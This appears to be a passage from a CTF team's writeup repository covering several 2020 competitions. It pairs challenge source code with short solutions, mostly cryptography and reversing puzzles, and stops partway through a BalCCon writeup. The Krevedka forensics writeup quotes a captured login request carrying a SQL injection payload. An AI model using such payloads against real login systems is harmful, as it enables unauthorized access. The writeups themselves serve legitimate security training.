https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-07-03-ASIS-quals/latte/flag.latte -------------------------------------------------------------------------------- /2020-07-03-ASIS-quals/latte/latte: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-07-03-ASIS-quals/latte/latte -------------------------------------------------------------------------------- /2020-07-03-ASIS-quals/mgr/flag.enc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-07-03-ASIS-quals/mgr/flag.enc -------------------------------------------------------------------------------- /2020-07-03-ASIS-quals/mgr/mgr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-07-03-ASIS-quals/mgr/mgr -------------------------------------------------------------------------------- /2020-07-03-ASIS-quals/tripolar/flag.enc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-07-03-ASIS-quals/tripolar/flag.enc -------------------------------------------------------------------------------- /2020-07-03-ASIS-quals/tripolar/tripolar.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | from Crypto.Util.number import * 4 | from hashlib import sha1 5 | from flag import flag 6 | 7 | def crow(x, y, z): 8 | return (x**3 + 3*(x + 2)*y**2 + y**3 + 3*(x + y + 1)*z**2 + z**3 + 6*x**2 + (3*x**2 + 12*x + 5)*y + (3*x**2 + 6*(x + 1)*y + 3*y**2 + 6*x + 2)*z + 11*x) // 6 9 | 10 | def keygen(nbit): 11 | p, q, r = [getPrime(nbit) for _ in range(3)] 12 | pk = crow(p, q, r) 13 | return (p, q, r, pk) 14 | 15 | def encrypt(msg, key): 16 | p, q, r, pk = key 17 | _msg = bytes_to_long(msg) 18 | assert _msg < p * q * r 19 | _hash = bytes_to_long(sha1(msg).digest()) 20 | _enc = pow(_msg, 31337, p * q * r) 21 | return crow(_enc * pk, pk * _hash, _hash * _enc) 22 | 23 | key = keygen(256) 24 | enc = encrypt(flag, key) 25 | f = open('flag.enc', 'w') 26 | f.write(long_to_bytes(enc)) 27 | f.close() -------------------------------------------------------------------------------- /2020-07-25-CybricsCTF/README.md: -------------------------------------------------------------------------------- 1 | # Cybrics CTF 2020 2 | 3 | Team: XeR, BitK, shalom 4 | 5 | ### Table of contents 6 | 7 | * [Baby RE (reverse)](baby_re) 8 | * [Hellish reverse (misc)](hellish_re) 9 | * [Hunt (web)](hunt) 10 | * [XCorp (network)](xcorp) 11 | * [Serial (misc)](serial) 12 | * [Krevedka (forensics)](krevedka) 13 | * [gif2png (web)](gif2png) 14 | * [Broken Invitation (crypto)](invitation) 15 | * [Google cloud (forensics)](gcloud) 16 | * [Polyglot (re/misc)](polyglot) 17 | * [Too secure (crypto)](too_secure) 18 | * [Cat girl breach (re/misc)](catgirl) 19 | -------------------------------------------------------------------------------- /2020-07-25-CybricsCTF/baby_re/README.md: -------------------------------------------------------------------------------- 1 | # Baby RE (re, 50p, 314 solved) 2 | 3 | In the task we get a [weird XML](babyrev.xml) which is some configuration for https://snap.berkeley.edu/snap/snap.html 4 | We're too lazy to use such tools, and also best RE are just crypto blackboxes, so we scrolled through the XML and found: 5 | 6 | ```xml 7 | 66,88,67,83,72,66,82,90,86,18,77,16,98,17,76,18,126,97,79,69,126,102,17,17,69,126,77,116,66,74,0,92 8 | ``` 9 | 10 | It looked promising, so we checked what would this ascii-decode into. 11 | It was not a flag yet, but we figured that we know flag format `cybrics{XXX}` so we did some classic quick checks and: 12 | 13 | ```python 14 | data = [66, 88, 67, 83, 72, 66, 82, 90, 86, 18, 77, 16, 98, 17, 76, 18, 126, 97, 79, 69, 126, 102, 17, 17, 69, 126, 77, 116, 66, 74, 0, 92] 15 | string_data = "".join(map(chr, data)) 16 | print(xor_string("cybrics", string_data).encode("hex")) 17 | ``` 18 | 19 | And we got a bunch of `0x21`, so it seems every character is XORed with the same byte. 20 | So we can do: 21 | 22 | ```python 23 | print(xor_string(string_data, '\x21' * 100)) 24 | ``` 25 | 26 | To get `cybrics{w3l1C0m3_@nd_G00d_lUck!}` 27 | -------------------------------------------------------------------------------- /2020-07-25-CybricsCTF/catgirl/do_not_pet_me.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-07-25-CybricsCTF/catgirl/do_not_pet_me.exe -------------------------------------------------------------------------------- /2020-07-25-CybricsCTF/catgirl/flag.enc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-07-25-CybricsCTF/catgirl/flag.enc -------------------------------------------------------------------------------- /2020-07-25-CybricsCTF/gcloud/gcloud.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-07-25-CybricsCTF/gcloud/gcloud.pcap -------------------------------------------------------------------------------- /2020-07-25-CybricsCTF/gcloud/result.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-07-25-CybricsCTF/gcloud/result.jpg -------------------------------------------------------------------------------- /2020-07-25-CybricsCTF/hellish_re/README.md: -------------------------------------------------------------------------------- 1 | # Hellish RE (re, 50p, 134 solved) 2 | 3 | In the task we get an [archive](hellishreverse.tar.gz). 4 | This is important here, because the python flag checker inside the archive is impossible to reverse. 5 | The troll/trick here is that if we unpack this in two steps, first just gzip and then tar, we notice that the stored tar has a very interesting name: `vos_rebyc10_hellishreverse_verify_with_cybrics{ok_t4ht_wA5_qu1T3_4n_un3Xpec7eD_w4Y}.tar` 6 | 7 | We submit `cybrics{ok_t4ht_wA5_qu1T3_4n_un3Xpec7eD_w4Y}` to get the points. 8 | -------------------------------------------------------------------------------- /2020-07-25-CybricsCTF/hellish_re/hellishreverse.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-07-25-CybricsCTF/hellish_re/hellishreverse.tar.gz -------------------------------------------------------------------------------- /2020-07-25-CybricsCTF/hunt/README.md: -------------------------------------------------------------------------------- 1 | # Hunt (web, 50p, 577 solved) 2 | 3 | In the task we get access to a simple webpage with 5 re-captcha boxes: 4 | 5 | ![](captcha.png) 6 | 7 | The goal is to check all of them and submit form to get the flag. 8 | The issue is that those boxes are flying all over the screen... 9 | The important bit of the page code is: 10 | 11 | ```js 12 | function loop() { 13 | const height = window.innerHeight - captchaBox.offsetHeight; 14 | captchaBox.style.top = Math.sin(Date.now()/dividerA) * (height/2) + (height/2); 15 | 16 | const width = window.innerWidth - captchaBox.offsetWidth; 17 | captchaBox.style.left = Math.sin(Date.now()/dividerB) * (width/2) + (width/2); 18 | 19 | captchaBox.style.transform = `rotate(${Math.sin(Date.now()/dividerC) * 10}deg)`; 20 | 21 | setTimeout(loop, 1); 22 | } 23 | loop(); 24 | ``` 25 | 26 | We can simply patch `setTimeout` function from the browser console to stop the movement: 27 | 28 | ```js 29 | setTimeout = function(){} 30 | ``` 31 | 32 | And we get: `cybrics{Th0se_c4p7ch4s_c4n_hunter2_my_hunter2ing_hunter2}` 33 | -------------------------------------------------------------------------------- /2020-07-25-CybricsCTF/hunt/captcha.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-07-25-CybricsCTF/hunt/captcha.png -------------------------------------------------------------------------------- /2020-07-25-CybricsCTF/invitation/broken_invitation.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-07-25-CybricsCTF/invitation/broken_invitation.pdf -------------------------------------------------------------------------------- /2020-07-25-CybricsCTF/krevedka/README.md: -------------------------------------------------------------------------------- 1 | # Krevedka (forensics, 50p, 164 solved) 2 | 3 | In the task we get a 300MB pcap file to analyse (sorry, won't include it here). 4 | We know that the user who got hacked had login `caleches` and we're supposed to find the attacker's login. 5 | 6 | If we look for victim login we find: 7 | 8 | ``` 9 | POST /login HTTP/1.1 10 | Host: kr3vedko.com 11 | User-Agent: UCWEB/2.0 (Linux; U; Opera Mini/7.1.32052/30.3697; www1.smart.com.ph/; GT-S5360) U2/1.0.0 UCBrowser/9.8.0.534 Mobile 12 | Accept-Encoding: gzip, deflate 13 | Accept: */* 14 | Connection: keep-alive 15 | Cookie: session=b75d53bb-1326-4d78-aedf-9bd92e237fbf 16 | Content-Length: 39 17 | Content-Type: application/x-www-form-urlencoded 18 | 19 | login=caleches&password=%22+or+1%3D1+-- 20 | ``` 21 | 22 | so a classic SQLi attack vector. 23 | 24 | The idea to find the real attacker is pretty simple: notice that there was already a session cookie included in the request! Perhaps it was set during previous attacker login? 25 | Sadly, not the case. 26 | 27 | On top of that attacker had some really interesting UA string, not very common. 28 | If we look for the UA we can find: 29 | 30 | ``` 31 | POST /login HTTP/1.1 32 | Host: kr3vedko.com 33 | User-Agent: UCWEB/2.0 (Linux; U; Opera Mini/7.1.32052/30.3697; www1.smart.com.ph/; GT-S5360) U2/1.0.0 UCBrowser/9.8.0.534 Mobile 34 | Accept-Encoding: gzip, deflate 35 | Accept: */* 36 | Connection: keep-alive 37 | Cookie: session=d4c78f87-b88c-4833-8851-ffd12856cf39 38 | Content-Length: 35 39 | Content-Type: application/x-www-form-urlencoded 40 | 41 | login=micropetalous&password=1221nr 42 | ``` 43 | 44 | And this is our flag: `cybrics{micropetalous}` 45 | -------------------------------------------------------------------------------- /2020-07-25-CybricsCTF/serial/1.js: -------------------------------------------------------------------------------- 1 | var http = require('http'); 2 | var url = require('url'); 3 | var parse = require('querystring'); 4 | var fs = require('fs'); 5 | var index = fs.readFileSync('index.html'); 6 | var flag = fs.readFileSync('flag.html'); 7 | var err = fs.readFileSync('error.html'); 8 | 9 | http.createServer(function (req, res) { 10 | var q = url.parse(req.url, true) 11 | if (q.path == "/"){ 12 | res.writeHead(200,{"Content-Type": "text/html"}); 13 | res.write(index); //write a response to the client 14 | res.end(); //end the response 15 | } 16 | else if (q.path == "/enter"){ 17 | if (req.method === 'POST') { 18 | var body = ''; 19 | req.on('data', chunk=> {body += chunk.toString()}); 20 | req.on('end', () => { 21 | body = parse.parse(body); 22 | var a=parseInt(body.serial1),b=parseInt(body.serial2),c=parseInt(body.serial3); 23 | console.log("Serial:",a,b,c) 24 | if ( (a>0 && a < 1000000) & (b>0 && b < 1000000) & (c>0 && c < 1000000) & a*a*a + b*b*b == c*c*c){ 25 | res.writeHead(200,{"Content-Type": "text/html"}); 26 | res.write(flag); 27 | res.end(); 28 | } 29 | else{ 30 | res.writeHead(200,{"Content-Type": "text/html"}); 31 | res.write(err); 32 | res.end(); 33 | } 34 | } 35 | ) 36 | }; 37 | } 38 | else{ 39 | res.writeHead(404,{"Content-Type": "text/html"}); 40 | res.write("

404 Not found

"); 41 | res.end(); 42 | } 43 | } 44 | ).listen(8081); 45 | 46 | -------------------------------------------------------------------------------- /2020-07-25-CybricsCTF/serial/README.md: -------------------------------------------------------------------------------- 1 | # Serial (misc, 63p, 108 solved) 2 | 3 | In the task we can access a web-based serial number checker. 4 | We also have access to the [code](1.js). 5 | 6 | It might seem trivial, because the code is just: 7 | 8 | ```js 9 | if ( (a>0 && a < 1000000) & (b>0 && b < 1000000) & (c>0 && c < 1000000) & a*a*a + b*b*b == c*c*c){ 10 | res.writeHead(200,{"Content-Type": "text/html"}); 11 | res.write(flag); 12 | res.end(); 13 | } 14 | ``` 15 | 16 | So we just need to find 3 numbers which match given condition. 17 | Unfortunately, this is actually contradicting Fermat's Last Theorem https://en.wikipedia.org/wiki/Fermat%27s_Last_Theorem so there needs to be something fishy here. 18 | 19 | We quickly stumble upon `Number.MAX_SAFE_INTEGER` value in JS https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Number/MAX_SAFE_INTEGER 20 | 21 | Apparently internally integers are stored as floats, and thus have precision limit, and above this particular value comparison might find two different numbers to be equal. 22 | 23 | We now just need to compute 3rd integer root of this value and set `a=c=iroot(Number.MAX_SAFE_INTEGER, 3)+1` and `b=1`. 24 | 25 | This way `a**3` and `c**3` will be above `Number.MAX_SAFE_INTEGER` and if we just add `1` the comparison will still show as equal. 26 | 27 | We send `a=c=208064` and `b=1` and get `cybrics{CYB3R_M47H_15_57R4Ng3}` 28 | -------------------------------------------------------------------------------- /2020-07-25-CybricsCTF/too_secure/too_secure.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-07-25-CybricsCTF/too_secure/too_secure.pdf -------------------------------------------------------------------------------- /2020-07-25-CybricsCTF/xcorp/README.md: -------------------------------------------------------------------------------- 1 | # XCorp (network, 50p, 159 solved) 2 | 3 | In the task we get a [pcap](xcorp.pcap) to analyse. 4 | Networ Miner recovers [executable](net10.exe) for us included in the pcap. 5 | 6 | It's a simple .NET binary, with most important part of the code being: 7 | 8 | ```csharp 9 | private void button1_Click(object sender, EventArgs e) 10 | { 11 | byte[] bytes = Encoding.ASCII.GetBytes(this.textBox1.Text); 12 | if (bytes.Length == 0) 13 | { 14 | MessageBox.Show("Please, enter username!"); 15 | return; 16 | } 17 | byte[] bytes2 = RC4.Encrypt(bytes, this.corp); 18 | if (Encoding.ASCII.GetString(bytes2) != "xcorporation") 19 | { 20 | MessageBox.Show("Incorrect!"); 21 | return; 22 | } 23 | byte[] bytes3 = RC4.Encrypt(bytes, this.flag); 24 | this.label2.Text = Encoding.ASCII.GetString(bytes3); 25 | } 26 | ``` 27 | 28 | First static buffer is: 29 | ``` 30 | [218, 201, 193, 75, 114, 18, 81, 42, 33, 53, 127, 239] 31 | ``` 32 | 33 | And second one: 34 | 35 | ``` 36 | [193, 211, 204, 75, 107, 30, 80, 48, 96, 111, 83, 244, 91, 214, 52, 0, 186, 157, 89, 127, 139, 164, 4, 105, 60, 22, 134, 43, 112, 69, 194] 37 | ``` 38 | 39 | RC4 is a stream cipher, so we could use the `xcorporation` plaintext and ciphertext to recover keystream, and decrypt prefix of the flag, but this is not very useful. 40 | We actually need to find the valid username. 41 | Grepping through the pcap we notice an interesting UTF string `u17ra_h4ck3r`, which turns out to be the valid RC4 passphrase: 42 | 43 | ```python 44 | xcorp_ct = "".join(map(chr, [218, 201, 193, 75, 114, 18, 81, 42, 33, 53, 127, 239])) 45 | flag_ct = "".join(map(chr, [193, 211, 204, 75, 107, 30, 80, 48, 96, 111, 83, 244, 91, 214, 52, 0, 186, 157, 89, 127, 139, 164, 4, 105, 60, 22, 134, 43, 112, 69, 194])) 46 | keystream = xor_string(xcorp_ct, 'xcorporation') 47 | print('flag prefix', xor_string(keystream, flag_ct)) 48 | rc4_key_bytes = rc4(map(ord, 'u17ra_h4ck3r'), 100) 49 | keystream = "".join(map(chr, rc4_key_bytes)) 50 | print('flag', xor_string(keystream, flag_ct)) 51 | ``` 52 | 53 | And we get: `cybrics{53CuR1tY_N07_0b5CuR17Y}` 54 | -------------------------------------------------------------------------------- /2020-07-25-CybricsCTF/xcorp/net10.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-07-25-CybricsCTF/xcorp/net10.exe -------------------------------------------------------------------------------- /2020-07-25-CybricsCTF/xcorp/xcorp.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-07-25-CybricsCTF/xcorp/xcorp.pcap -------------------------------------------------------------------------------- /2020-07-31-InCTF/README.md: -------------------------------------------------------------------------------- 1 | # InCTF 2020 2 | 3 | Team: XeR, SIben, Yumemi, shalom 4 | 5 | ### Table of contents 6 | 7 | * [Coins (misc/ppc)](coins) 8 | * [Invisible maze (misc/re)](maze) 9 | * [RE warmup (reverse)](re_warmup) 10 | * [ArchRide (reverse)](archride) 11 | * [Video bazar (web)](video) 12 | * [Poly RSA (crypto)](rsapoly) 13 | * [bakflip&sons (crypto)](backflip) 14 | * [DLPoly (crypto)](dlpoly) 15 | -------------------------------------------------------------------------------- /2020-07-31-InCTF/archride/surprise: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-07-31-InCTF/archride/surprise -------------------------------------------------------------------------------- /2020-07-31-InCTF/backflip/bakflips.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import random, sys 4 | from binascii import hexlify, unhexlify 5 | from ecdsa import SigningKey, NIST192p 6 | from flag import flag 7 | 8 | secret_multiplier = random.getrandbits(101) 9 | 10 | def menu(): 11 | menu = [exit, signMessage, verifyMessage, getFlag, sys.exit] 12 | 13 | print(""" 14 | bakflip&sons Signature Scheme 15 | 16 | 1) Sign Message 17 | 2) Verify Signature 18 | 3) Get Flag 19 | 4) Exit 20 | [ecdsa@cryptolab]# """, end = "") 21 | 22 | choice = int(input()) 23 | menu[choice]() 24 | 25 | def signMessage(): 26 | print(""" 27 | Sign Message Service - courtsy of bakflip&sons 28 | """) 29 | 30 | message = input("Enter a message to sign: ").encode() 31 | if message == b'please_give_me_the_flag': 32 | print("\n\t:Coughs: This ain't that easy as Verifier1") 33 | sys.exit() 34 | secret_mask = int(input("Now insert a really stupid value here: ")) 35 | 36 | secret = secret_multiplier ^ secret_mask 37 | 38 | signingKey = SigningKey.from_secret_exponent(secret) 39 | signature = signingKey.sign(message) 40 | print("Signature: ", hexlify(signature).decode()) 41 | 42 | 43 | def verifyMessage(): 44 | raise( 45 | NotImplementedError( 46 | "Geez! We are working round the clock to get this Beetle fixed." 47 | ) 48 | ) 49 | 50 | def getFlag(): 51 | print(""" 52 | BeetleBountyProgram - by bakflip&sons 53 | 54 | Wanted! Patched or Alive- $200,000 55 | Submit a valid signature for 'please_give_me_the_flag' and claim the flag 56 | """) 57 | signingKey = SigningKey.from_secret_exponent(secret_multiplier) 58 | verifyingKey = signingKey.verifying_key 59 | try: 60 | signature = unhexlify(input("Forged Signature: ")) 61 | if verifyingKey.verify(signature, b'please_give_me_the_flag'): 62 | print(flag) 63 | except: 64 | print("Phew! that was close") 65 | 66 | 67 | if __name__=="__main__": 68 | for i in range(73): menu() 69 | -------------------------------------------------------------------------------- /2020-07-31-InCTF/maze/output.gb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-07-31-InCTF/maze/output.gb -------------------------------------------------------------------------------- /2020-07-31-InCTF/re_warmup/warmup: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-07-31-InCTF/re_warmup/warmup -------------------------------------------------------------------------------- /2020-07-31-InCTF/video/out.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-07-31-InCTF/video/out.gif -------------------------------------------------------------------------------- /2020-08-24-GoogleCTF/README.md: -------------------------------------------------------------------------------- 1 | # GoogleCTF 2020 2 | 3 | Team: BitK, XeR, SakiiR, shalom 4 | 5 | ### Table of contents 6 | 7 | * [Beginner (re)](beginner) 8 | * [Android (re)](android) 9 | * [Basics (hardware)](basics) 10 | * [Chunk norris (crypto)](chunk) 11 | * [SHArky (crypto)](sharky) 12 | * [YAFM (crypto)](yafm) 13 | -------------------------------------------------------------------------------- /2020-08-24-GoogleCTF/android/reverse.apk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-08-24-GoogleCTF/android/reverse.apk -------------------------------------------------------------------------------- /2020-08-24-GoogleCTF/basics/check.sv: -------------------------------------------------------------------------------- 1 | module check( 2 | input clk, 3 | 4 | input [6:0] data, // 7 bit input 5 | output wire open_safe 6 | ); 7 | 8 | reg [6:0] memory [7:0]; // 8 element array of 7 bit registers 9 | reg [2:0] idx = 0; // 3 bit register, so counting mod 8 10 | 11 | wire [55:0] magic = { // 56 bit array, again MSB to LSB concat bo bits 12 | {memory[0], memory[5]}, // msb to lsb concat, so memory[0][7],...,memory[0][0],memory[1][7],...,memory[1][0] 13 | {memory[6], memory[2]}, 14 | {memory[4], memory[3]}, 15 | {memory[7], memory[1]} 16 | }; 17 | 18 | wire [55:0] kittens = { magic[9:0], magic[41:22], magic[21:10], magic[55:42] }; 19 | assign open_safe = kittens == 56'd3008192072309708; // 56 bit decimal number 20 | 21 | always_ff @(posedge clk) begin 22 | memory[idx] <= data; 23 | idx <= idx + 5; // it's index % 8 so we're filling memory in order 0, 5, 2, 7, 4, 1, 6, 3 24 | end 25 | 26 | endmodule 27 | 28 | -------------------------------------------------------------------------------- /2020-08-24-GoogleCTF/basics/main.cpp: -------------------------------------------------------------------------------- 1 | #include "obj_dir/Vcheck.h" 2 | 3 | #include 4 | #include 5 | 6 | int main(int argc, char *argv[]) { 7 | Verilated::commandArgs(argc, argv); 8 | std::cout << "Enter password:" << std::endl; 9 | auto check = std::make_unique(); 10 | 11 | for (int i = 0; i < 100 && !check->open_safe; i++) { 12 | int c = fgetc(stdin); 13 | if (c == '\n' || c < 0) break; 14 | check->data = c & 0x7f; 15 | check->clk = false; 16 | check->eval(); 17 | check->clk = true; 18 | check->eval(); 19 | } 20 | if (check->open_safe) { 21 | std::cout << "CTF{real flag would be here}" << std::endl; 22 | } else { 23 | std::cout << "=(" << std::endl; 24 | } 25 | return 0; 26 | } 27 | 28 | -------------------------------------------------------------------------------- /2020-08-24-GoogleCTF/beginner/beginner: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-08-24-GoogleCTF/beginner/beginner -------------------------------------------------------------------------------- /2020-08-24-GoogleCTF/chunk/challenge.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 -u 2 | 3 | import random 4 | from Crypto.Util.number import * 5 | import gmpy2 6 | 7 | a = 0xe64a5f84e2762be5 8 | chunk_size = 64 9 | 10 | def gen_prime(bits): 11 | s = random.getrandbits(chunk_size) 12 | 13 | while True: 14 | s |= 0xc000000000000001 15 | p = 0 16 | for _ in range(bits // chunk_size): 17 | p = (p << chunk_size) + s 18 | s = a * s % 2**chunk_size 19 | if gmpy2.is_prime(p): 20 | return p 21 | 22 | n = gen_prime(1024) * gen_prime(1024) 23 | e = 65537 24 | flag = open("flag.txt", "rb").read() 25 | print('n =', hex(n)) 26 | print('e =', hex(e)) 27 | print('c =', hex(pow(bytes_to_long(flag), e, n))) 28 | -------------------------------------------------------------------------------- /2020-08-24-GoogleCTF/chunk/output.txt: -------------------------------------------------------------------------------- 1 | n = 0xab802dca026b18251449baece42ba2162bf1f8f5dda60da5f8baef3e5dd49d155c1701a21c2bd5dfee142fd3a240f429878c8d4402f5c4c7f4bc630c74a4d263db3674669a18c9a7f5018c2f32cb4732acf448c95de86fcd6f312287cebff378125f12458932722ca2f1a891f319ec672da65ea03d0e74e7b601a04435598e2994423362ec605ef5968456970cb367f6b6e55f9d713d82f89aca0b633e7643ddb0ec263dc29f0946cfc28ccbf8e65c2da1b67b18a3fbc8cee3305a25841dfa31990f9aab219c85a2149e51dff2ab7e0989a50d988ca9ccdce34892eb27686fa985f96061620e6902e42bdd00d2768b14a9eb39b3feee51e80273d3d4255f6b19 2 | e = 0x10001 3 | c = 0x6a12d56e26e460f456102c83c68b5cf355b2e57d5b176b32658d07619ce8e542d927bbea12fb8f90d7a1922fe68077af0f3794bfd26e7d560031c7c9238198685ad9ef1ac1966da39936b33c7bb00bdb13bec27b23f87028e99fdea0fbee4df721fd487d491e9d3087e986a79106f9d6f5431522270200c5d545d19df446dee6baa3051be6332ad7e4e6f44260b1594ec8a588c0450bcc8f23abb0121bcabf7551fd0ec11cd61c55ea89ae5d9bcc91f46b39d84f808562a42bb87a8854373b234e71fe6688021672c271c22aad0887304f7dd2b5f77136271a571591c48f438e6f1c08ed65d0088da562e0d8ae2dadd1234e72a40141429f5746d2d41452d916 4 | -------------------------------------------------------------------------------- /2020-08-24-GoogleCTF/sharky/challenge.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/python3 2 | import binascii 3 | import os 4 | import sha256 5 | 6 | # Setup msg_secret and flag 7 | FLAG_PATH = 'data/flag.txt' 8 | NUM_KEYS = 8 9 | MSG = b'Encoded with random keys' 10 | 11 | with open(FLAG_PATH, 'rb') as f: 12 | FLAG = f.read().strip().decode('utf-8') 13 | 14 | 15 | def sha256_with_secret_round_keys(m: bytes, secret_round_keys: dict) -> bytes: 16 | """Computes SHA256 with some secret round keys. 17 | 18 | Args: 19 | m: the message to hash 20 | secret_round_keys: a dictionary where secret_round_keys[i] is the value of 21 | the round key k[i] used in SHA-256 22 | 23 | Returns: 24 | the digest 25 | """ 26 | sha = sha256.SHA256() 27 | round_keys = sha.k[:] 28 | for i, v in secret_round_keys.items(): 29 | round_keys[i] = v 30 | return sha.sha256(m, round_keys) 31 | 32 | 33 | def generate_random_round_keys(cnt: int): 34 | res = {} 35 | for i in range(cnt): 36 | rk = 0 37 | for b in os.urandom(4): 38 | rk = rk * 256 + b 39 | res[i] = rk 40 | return res 41 | 42 | if __name__ == '__main__': 43 | secret_round_keys = generate_random_round_keys(NUM_KEYS) 44 | digest = sha256_with_secret_round_keys(MSG, secret_round_keys) 45 | print('MSG Digest: {}'.format(binascii.hexlify(digest).decode())) 46 | GIVEN_KEYS = list(map(lambda s: int(s, 16), input('Enter keys: ').split(','))) 47 | assert len(GIVEN_KEYS) == NUM_KEYS, 'Wrong number of keys provided.' 48 | 49 | if all([GIVEN_KEYS[i] == secret_round_keys[i] for i in range(NUM_KEYS)]): 50 | print('\nGood job, here\'s a flag: {0}'.format(FLAG)) 51 | else: 52 | print('\nSorry, that\'s not right.') 53 | -------------------------------------------------------------------------------- /2020-08-24-GoogleCTF/yafm/server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 -u 2 | 3 | import random 4 | from Crypto.Util.number import * 5 | from Crypto.Cipher import PKCS1_OAEP 6 | from Crypto.PublicKey import RSA 7 | import binascii 8 | 9 | def generate_prime(prime_len): 10 | bits_len = 180 11 | while True: 12 | bits = random.getrandbits(bits_len) 13 | idxs = random.sample(list(range(1, prime_len-2)), bits_len) 14 | p = 1 | 2**(prime_len - 1) | 2**(prime_len - 2) 15 | for i in range(bits_len): 16 | p += (bits >> i & 1)*2**idxs[i] 17 | if isPrime(p): 18 | return p 19 | 20 | key = None 21 | flag = open("flag.txt", "rb").read() 22 | 23 | print("Welcome to my Prime Obsession. Tell me what do you want.\n") 24 | while True: 25 | print("[1] Generate key") 26 | print("[2] Get Encrypted flag") 27 | print("[3] Exit") 28 | opt = int(input(">>> ")) 29 | if opt == 1: 30 | p = generate_prime(1024) 31 | q = generate_prime(1024) 32 | e = 65537 33 | n = p*q 34 | key = RSA.construct((n, e)) 35 | print(key.exportKey('PEM').decode()) 36 | if opt == 2: 37 | if not key: 38 | print("No key generated :/") 39 | else: 40 | cipher = PKCS1_OAEP.new(key) 41 | print(binascii.hexlify(cipher.encrypt(flag)).decode()) 42 | if opt == 3: 43 | print("You are not obsessed enough :/") 44 | break 45 | print("\n") 46 | -------------------------------------------------------------------------------- /2020-09-25-BalCCon/README.md: -------------------------------------------------------------------------------- 1 | # BalCCon2k20 CTF 2 | 3 | Team: BitK, XeR, SakiiR, shalom 4 | 5 | ### Table of contents 6 | 7 | * [Cryptsh (crypto)](cryptosh) 8 | * [Do U Have Knowledge (crypto)](do_u_have_knowledge) 9 | * [Katherine (crypto)](Katherine) 10 | * [RaKeeJaPassRPC (crypto)](RaKeeJaPassRPC) 11 | * [Mindgames 1336 (pwn)](mindgames_1336) 12 | * [Mindgames 1337 (pwn)](mindgames_1337) 13 | * [Mindgames 1338 (pwn)](mindgames_1338) 14 | * [heapmailer (pwn)](heapmailer) 15 | * [IoT Grill (pwn)](iot_grill) 16 | * [Turbo Blaise (rev)](turboblaise) 17 | * [shallweplayagame (rev)](shallweplayagame) 18 | * [RageQuit (rev)](ragequit) 19 | -------------------------------------------------------------------------------- /2020-09-25-BalCCon/RaKeeJaPassRPC/README.md: -------------------------------------------------------------------------------- 1 | # RaKeeJaPassRPC (crypto, 466p, 9 solved) 2 | 3 | ## Description 4 | 5 | In the task we get the [server source code](server.py) and we even got a full [client](client.py)! 6 | We can also connect to remote server, where this server is running. 7 | 8 | ## Code analysis 9 | 10 | I won't lie, the code looks pretty complex. 11 | There is some complicated DH-like key exchange logic with some special token password, which by the power of math allows two sides to agree on a shared secret which is used to encrytp the flag. 12 | 13 | We spent some time going through the math here to understand how this all works, but it's really not useful in the end. 14 | The critical part is: 15 | 16 | ```python 17 | key = sha256(f'{S:X}'.encode()).digest() 18 | ``` 19 | 20 | AES key is generated from value `S`, which in turn comes from: 21 | 22 | ```python 23 | S = pow(A * pow(v, u, N), b, N) 24 | ``` 25 | 26 | Where `A` is the value we provide to the server. 27 | 28 | There is also a check on the value of: 29 | 30 | ```python 31 | M = sha256(f'{A:X}{B:X}{S:X}'.encode()).digest().hex() 32 | ``` 33 | 34 | But `A` we provide, `B` is given to us by the server, hence again if we know `S` we can compute this value easily. 35 | 36 | ## Vulnerability 37 | 38 | Notice that the server never performs any checks on the value `A` we provided. 